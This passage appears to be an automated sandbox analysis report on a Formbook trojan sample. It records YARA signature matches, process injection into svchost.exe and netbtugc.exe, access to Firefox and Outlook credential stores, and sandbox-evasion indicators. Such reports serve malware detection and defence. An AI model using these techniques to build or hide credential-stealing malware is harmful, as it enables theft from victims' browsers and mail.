            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03479C3210_2_03479C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BFCF210_2_034BFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C115E010_2_02C115E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C0C7C710_2_02C0C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C0C7D010_2_02C0C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C0AA7010_2_02C0AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C0C9F010_2_02C0C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C130EE10_2_02C130EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C130F010_2_02C130F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C29FD010_2_02C29FD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 283 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 109 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03435130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0347F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 033EB970 appears 283 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03447E54 appears 109 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0346EA12 appears 86 times
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: String function: 0095F9F2 appears 40 times
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: String function: 00960A30 appears 46 times
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: String function: 00949CB3 appears 31 times
            Source: Document 151-512024.exe, 00000000.00000003.1224338538.0000000003B7D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Document 151-512024.exe
            Source: Document 151-512024.exe, 00000000.00000003.1221860341.0000000003983000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Document 151-512024.exe
            Source: Document 151-512024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@14/12
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B37B5 GetLastError,FormatMessageW,0_2_009B37B5
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A10BF AdjustTokenPrivileges,CloseHandle,0_2_009A10BF
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009A16C3
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009B51CD
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_009CA67C
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_009B648E
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_009442A2
            Source: C:\Users\user\Desktop\Document 151-512024.exeFile created: C:\Users\user\AppData\Local\Temp\autB569.tmpJump to behavior
            Source: Document 151-512024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 0000000A.00000003.1579465591.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.000000000301E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002FF2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002FFB000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1579659701.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Document 151-512024.exeReversingLabs: Detection: 63%
            Source: Document 151-512024.exeVirustotal: Detection: 61%
            Source: unknownProcess created: C:\Users\user\Desktop\Document 151-512024.exe "C:\Users\user\Desktop\Document 151-512024.exe"
            Source: C:\Users\user\Desktop\Document 151-512024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document 151-512024.exe"
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Document 151-512024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document 151-512024.exe"Jump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Document 151-512024.exeStatic file information: File size 1246208 > 1048576
            Source: Document 151-512024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Document 151-512024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Document 151-512024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Document 151-512024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Document 151-512024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Document 151-512024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Document 151-512024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689713194.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689548451.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Document 151-512024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Document 151-512024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Document 151-512024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Document 151-512024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Document 151-512024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009442DE
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00960A76 push ecx; ret 0_2_00960A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00420933 push es; ret 2_2_00420953
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330225F pushad ; ret 2_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033027FA pushad ; ret 2_2_033027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx2_2_033309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330283D push eax; iretd 2_2_03302858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033C225F pushad ; ret 10_2_033C27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033C27FA pushad ; ret 10_2_033C27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033F09AD push ecx; mov dword ptr [esp], ecx10_2_033F09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033C283D push eax; iretd 10_2_033C2858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C12238 pushad ; iretd 10_2_02C12239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1AB37 push 00000038h; iretd 10_2_02C1AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C10EAB push ebp; retf 10_2_02C10EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C16E56 push ebx; iretd 10_2_02C16E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C16CB3 push ebx; iretd 10_2_02C16E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1101F push es; iretd 10_2_02C11027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1D1AB push es; ret 10_2_02C1D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1D1B0 push es; ret 10_2_02C1D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C01126 push esp; ret 10_2_02C01127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1550F pushad ; retf 10_2_02C15510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1D83B push esi; iretd 10_2_02C1D83C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C0FFA0 push esi; iretd 10_2_02C0FFA5
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0095F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0095F98E
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009D1C41
            Source: C:\Users\user\Desktop\Document 151-512024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Document 151-512024.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-99359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 1620Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 8352Jump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeAPI coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188Thread sleep count: 1620 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188Thread sleep time: -3240000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188Thread sleep count: 8352 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8188Thread sleep time: -16704000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932Thread sleep time: -45000s >= -30000sJump to behavior
